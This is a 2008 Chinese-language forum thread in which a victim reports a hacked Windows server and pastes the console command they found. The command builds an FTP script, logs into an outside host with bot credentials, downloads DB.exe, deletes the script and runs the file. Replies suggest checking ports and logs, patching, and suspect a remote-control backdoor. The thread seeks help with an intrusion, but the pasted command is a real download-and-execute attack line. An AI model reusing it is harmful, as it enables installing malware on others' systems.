none
系統被HACK了 RRS feed

  • 問題

  • 一早回來發現指令模式的窗框彈出了以下訊息

      c:\windows\system32>cmd /c echo open ftpd.xbytez.com.zr 21 >> ik &  B0t_a159753b >> ik &echo Binary >> ik $echo bye >> ik $ftp -n -v -s:ik &del ik &DB.exe &exit

    ftp> open ftpd.xbytez.com.zr 21

    ftp> user B0t _A159753b

    ftp> binary

    ftp> get DB.exe

     

    在網上找過資料並無相關文章,伺服器亦找不到相關的檔案,防火牆亦有設定。

    請問有誰可以幫助解答,如何找出根源!

    2008年1月9日 上午 01:52

解答

  • 1. 看你有開哪些port,查那些服務的log

    2. 沒定時Windows Update,系統漏洞被利用

    3. 人為疏失,有人執行了有問題的檔案

    2008年1月10日 上午 09:26
  • 我覺得可能是沒寫好的後門,沒把視窗隱藏起來,下載的可能是遠端遙控的程式。

     

    2008年1月10日 下午 03:44

所有回覆

  • 1. 看你有開哪些port,查那些服務的log

    2. 沒定時Windows Update,系統漏洞被利用

    3. 人為疏失,有人執行了有問題的檔案

    2008年1月10日 上午 09:26
  • 我覺得可能是沒寫好的後門,沒把視窗隱藏起來,下載的可能是遠端遙控的程式。

     

    2008年1月10日 下午 03:44